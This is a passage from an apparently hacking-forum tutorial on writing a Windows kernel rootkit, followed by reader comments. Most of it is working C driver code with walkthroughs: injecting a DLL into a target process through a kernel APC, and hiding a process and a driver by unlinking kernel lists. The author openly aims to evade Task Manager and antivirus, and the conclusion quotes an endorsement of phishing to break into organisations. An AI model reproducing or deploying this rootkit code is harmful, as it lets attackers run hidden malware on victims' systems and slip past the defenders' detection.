    cidprocess.UniqueThread = 0;

    // Open the target process
    if (NT_SUCCESS(ZwOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &oa, &cidprocess)))
    {
        // Allocate virtual memory in the target process
        if (NT_SUCCESS(ZwAllocateVirtualMemory(hProcess, &pvMemory, 0, &Size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE)))
        {
            // Create an APC (Asynchronous Procedure Call) to load the DLL
            KAPC_STATE KasState;
            PKAPC Apc;

            // Attach to the target process
            KeStackAttachProcess(Peprocess, &KasState);

            // Copy the DLL path to the target process's memory
            strcpy(pvMemory, DllFormatPath);

            // Detach from the target process
            KeUnstackDetachProcess(&KasState);

            // Allocate memory for the APC
            Apc = (PKAPC)ExAllocatePool(NonPagedPool, sizeof(KAPC));
            if (Apc)
            {
                // Initialize the APC with the appropriate routine and parameters
                KeInitializeApc(Apc, Pethread, 0, (PKKERNEL_ROUTINE)APCKernelRoutine, 0, (PKNORMAL_ROUTINE)Hash.pvLoadLibraryExA, UserMode, pvMemory);

                // Insert the APC into the thread's queue
                KeInsertQueueApc(Apc, 0, 0, IO_NO_INCREMENT);
                return STATUS_SUCCESS;
            }
        }
        // Close the target process handle
        ZwClose(hProcess);
    }

    return STATUS_NO_MEMORY;
}

The DllInject function injects a DLL into a target process from kernel mode. It accepts the ProcessId of the target process, the PEPROCESS structure of the target process (Peprocess), the PETHREAD structure of the target thread (Pethread), and a Boolean value (Alert) meant to indicate whether alertable I/O is allowed. Note that the function body shown here does not use Alert.

The injection process begins with the opening of the target process using ZwOpenProcess. This step grants us access to the target process with full privileges.

Subsequently, we allocate virtual memory within the target process using ZwAllocateVirtualMemory. This allocated memory will be used to store the path to the DLL that we intend to inject.

To write data into the target process’s memory, we attach to the target process using KeStackAttachProcess. While attached, the current thread runs in the target’s address space, so the user-mode address returned by the allocation is valid for the copy.

With the attachment in place, we copy the path of the DLL to be injected into the allocated virtual memory within the target process. This path is defined in the DllFormatPath variable.

After successfully copying the DLL path, we detach from the target process using KeUnstackDetachProcess.

The heart of the DLL injection lies in the creation of an Asynchronous Procedure Call (APC). Memory for the APC is allocated with ExAllocatePool, and the APC is then set up as follows:

The Apc structure is initialized using KeInitializeApc.
The parameters include the target thread (Pethread) and a kernel routine (APCKernelRoutine).
The normal routine is specified as Hash.pvLoadLibraryExA, so the DLL is loaded by LoadLibraryExA from kernel32.dll, running in user mode (UserMode) with pvMemory, the copied DLL path, as its argument.
The APC is inserted into the thread’s queue with KeInsertQueueApc.

To ensure that DLL injection occurs in a controlled and synchronized manner, we rely on the SirifefWorkerRoutine and APCInjectorRoutine functions.

VOID SirifefWorkerRoutine(PVOID Context)
{
    DllInject(((PSIRIFEF_INJECTION_DATA)Context)->ProcessId, ((PSIRIFEF_INJECTION_DATA)Context)->Process, ((PSIRIFEF_INJECTION_DATA)Context)->Ethread, FALSE);
    KeSetEvent(&((PSIRIFEF_INJECTION_DATA)Context)->Event, (KPRIORITY)0, FALSE);
    return;
}

The SirifefWorkerRoutine function acts as a worker routine responsible for triggering the DLL injection. It accepts a single Context parameter.

Within this function, the actual DLL injection is initiated by calling the DllInject function. The parameters provided include the target process’s ID, the process’s EPROCESS structure, and the thread’s ETHREAD structure. The final parameter, FALSE, indicates that alertable I/O is not allowed.

Once DllInject returns, the event is signaled with KeSetEvent. The return value of DllInject is not checked, so the event marks completion of the attempt rather than a successful injection. This event allows us to synchronize the completion of the injection process with other parts of the code.

DLL Injection via APC

The APCInjectorRoutine function initiates and orchestrates our DLL injection process. It begins by initializing a SIRIFEF_INJECTION_DATA structure, Sf, and then queues a work item (SirifefWorkerRoutine) to perform the injection.

VOID NTAPI APCInjectorRoutine(PKAPC Apc, PKNORMAL_ROUTINE *NormalRoutine, PVOID *SystemArgument1, PVOID *SystemArgument2, PVOID* Context)
{
    SIRIFEF_INJECTION_DATA Sf;

    RtlSecureZeroMemory(&Sf, sizeof(SIRIFEF_INJECTION_DATA));
    ExFreePool(Apc);

    // Initialize the SIRIFEF_INJECTION_DATA structure with the necessary information
    Sf.Ethread = KeGetCurrentThread();
    Sf.Process = IoGetCurrentProcess();
    Sf.ProcessId = PsGetCurrentProcessId();

    // Initialize an event to synchronize the DLL injection
    KeInitializeEvent(&Sf.Event, NotificationEvent, FALSE);

    // Initialize a work item to execute the SirifefWorkerRoutine
    ExInitializeWorkItem(&Sf.WorkItem, (PWORKER_THREAD_ROUTINE)SirifefWorkerRoutine, &Sf);

    // Queue the work item to be executed on the DelayedWorkQueue
    ExQueueWorkItem(&Sf.WorkItem, DelayedWorkQueue);

    // Wait for the DLL injection to complete
    KeWaitForSingleObject(&Sf.Event, Executive, KernelMode, TRUE, 0);

    return;
}

These routines work together to schedule and execute the DLL injection into the target process after the kernel32.dll module is loaded. The injection is performed in a controlled and synchronized manner, ensuring that the target process is injected with the specified DLL.

Hide Process

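An interesting technique we can use in our rootkit is to hide a target process by unlinking it from the kernel’s list of active processes. The process then no longer appears in tools that enumerate that list, such as the Windows Task Manager, and may also go unnoticed by AV products that rely on it.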

To hide our process we need to understand a few Windows internal concepts, such as the EPROCESS data structure in the Windows kernel. EPROCESS is an opaque data structure in the Windows kernel that contains important information about processes running on the system. The offsets of this large structure change from build to build or version to version.

What we’re interested in is ActiveProcessLinks, a LIST_ENTRY structure embedded in EPROCESS. Because EPROCESS is opaque, we can’t simply write EPROCESS.ActiveProcessLinks. Instead, we have to use PsGetCurrentProcess to get the current EPROCESS and then add an offset that is version dependent. This is the downside of the EPROCESS structure: it makes it very hard to write a Windows kernel rootkit that is compatible across versions.

kd> dt nt!_EPROCESS
<..redacted...>
    +0x000 Pcb              : _KPROCESS
    +0x3e8 ProcessLock      : _EX_PUSH_LOCK
    +0x2f0 UniqueProcessId  : Ptr64 Void
    +0x400 ActiveProcessLinks : _LIST_ENTRY

LIST_ENTRY is the node type of a doubly-linked list: Flink (forward link) and Blink (backward link) point to the next and previous elements in the list.

Using the information above, we can hide our process from being shown by manipulating the kernel data structures. To hide our process we can do the following:

Point the ActiveProcessLinks.Flink of EPROCESS 1 to the ActiveProcessLinks of EPROCESS 3.
Point the ActiveProcessLinks.Blink of EPROCESS 3 to the ActiveProcessLinks of EPROCESS 1.

This manipulation unlinks the data structure of our target process, EPROCESS 2, from the doubly-linked list, so it is no longer seen by tools that enumerate processes by walking this list.

// Function to hide a process by manipulating kernel data structures
NTSTATUS HideProcess(ULONG pid) {
    PEPROCESS currentEProcess = PsGetCurrentProcess();
    LIST_ENTRY* currentList = &currentEProcess->ActiveProcessLinks;
    
    // Get the offsets for UniqueProcessId and ActiveProcessLinks
    ULONG uniqueProcessIdOffset = FIELD_OFFSET(EPROCESS, UniqueProcessId);
    ULONG activeProcessLinksOffset = FIELD_OFFSET(EPROCESS, ActiveProcessLinks);
    
    ULONG currentPid;
    
    do {
        // Check if the current process ID is the one to hide
        RtlCopyMemory(&currentPid, (PUCHAR)currentEProcess + uniqueProcessIdOffset, sizeof(currentPid));
        if (currentPid == pid) {
            // Remove the process from the list
            LIST_ENTRY* blink = currentList->Blink;
            LIST_ENTRY* flink = currentList->Flink;
            blink->Flink = flink;
            flink->Blink = blink;
            return STATUS_SUCCESS;
        }
        
        // Move to the next process
        currentList = currentList->Flink;
        currentEProcess = CONTAINING_RECORD(currentList, EPROCESS, ActiveProcessLinks);
    } while (currentList != &currentEProcess->ActiveProcessLinks);
    
    return STATUS_NOT_FOUND;  // Process not found
}

The HideProcess function hides a process using the DKOM (Direct Kernel Object Manipulation) technique. It takes the Process ID (PID) of the target process as an argument. Here’s how it works:

It starts by calling PsGetCurrentProcess to obtain the EPROCESS structure of the process in whose context the driver code is currently running.
The code then retrieves the offsets within the EPROCESS structure for UniqueProcessId and ActiveProcessLinks.
It iterates through the list of active processes, comparing the PID of each process with the target PID. When it finds a match, it unlinks the process from the ActiveProcessLinks list, effectively hiding it.
The function returns STATUS_SUCCESS if it successfully hides the process. If the target process is not found, it returns STATUS_NOT_FOUND.

Hiding a Driver

In addition to hiding processes, we can also employ the DKOM technique to hide drivers from the system. This is particularly useful in scenarios where a rootkit needs to remain undetected.

// Function to hide a driver by manipulating data structures
NTSTATUS HideDriver(PDRIVER_OBJECT driverObject) {
    KIRQL irql;
    
    // Raise IRQL to DPC level
    irql = KeRaiseIrqlToDpcLevel();
    
    // Get the module entry from the DriverObject
    PLDR_DATA_TABLE_ENTRY moduleEntry = (PLDR_DATA_TABLE_ENTRY)driverObject->DriverSection;
    
    // Unlink the module entry
    moduleEntry->InLoadOrderLinks.Blink->Flink = moduleEntry->InLoadOrderLinks.Flink;
    moduleEntry->InLoadOrderLinks.Flink->Blink = moduleEntry->InLoadOrderLinks.Blink;
    
    // Lower IRQL back to its original value
    KeLowerIrql(irql);
    
    return STATUS_SUCCESS;
}

The HideDriver function is designed to hide a driver by manipulating kernel data structures. Here’s a breakdown of how it works:

It raises the IRQL (Interrupt Request Level) to DPC (Deferred Procedure Call) level using KeRaiseIrqlToDpcLevel. This prevents the current thread from being preempted on its processor while the data structures are modified. It does not by itself synchronize with code running on other processors.
Next, it obtains the module entry by casting the DriverSection member of the provided driverObject to a PLDR_DATA_TABLE_ENTRY. This provides access to information about the driver module.
It unlinks the module entry from the kernel’s internal linked lists. By manipulating the InLoadOrderLinks member of the module entry, it effectively removes the driver from the list of loaded modules.
Finally, it lowers the IRQL back to its original value using KeLowerIrql, allowing normal system operation to resume.

Conclusion

Thank you for reading, and I hope you’ve learned something from this. We’ve covered a lot of topics. I removed the shellcode development section to keep things simpler; I may cover it in a separate article. I’ve included the resources that helped me create this article. Remember,

" Social engineering and phishing, combined with some operative knowledge about windows hacking, should be enough to get you inside the networks of most organization"

References and Credits

Anatomy of the Process Environment Block (PEB) (Windows Internals)

Manipulating Active processlinks

DLL Injection

Kernel Mode Rootkits

Enumerating RWX Protected Memory Regions for Code Injection

Windows APT Warfare

c0mrade · November 8, 2023, 9:26am

I could download this as a pdf or something

messede · November 8, 2023, 4:12pm

another excellent piece.

cicada · November 8, 2023, 7:03pm

Now THIS is excellent content

vict0ni · November 9, 2023, 9:05am

you can do ctrl + P and save the file as a pdf

ATreeShine · November 13, 2023, 2:05pm

That’s amazing, thanks.

Secey · November 16, 2023, 8:16am

This article is impressive,thanks.

EG1116 · November 18, 2023, 4:01pm

Thanks for your thread.

initfs · March 7, 2024, 3:16am

This is so dense, so obviously this left me with some questions:

How the rootkit its installed, I mean, in linux you have lkm system but on windows what?
The rootkit for windows 7 could be run in windows 10? if not how modify the code to make it compatible? in linux you can explore the code, so you have a very clear picture of what happened in what version but the windows kernel is more obscure
I read from an article about writing rootkits the next thing:

All you need is do is learn assembly and C/C++ programming, plus exploit development, reverse engineering, and Windows internals, and then find and abuse a buggy driver, and inject and install your rootkit, and bam.

article

is this true?

Your content is so advance, I like it so much, but I still feel it like is more about the “what” and not the “why”, so at the end I just know how to do the things but I do not comprehend it.

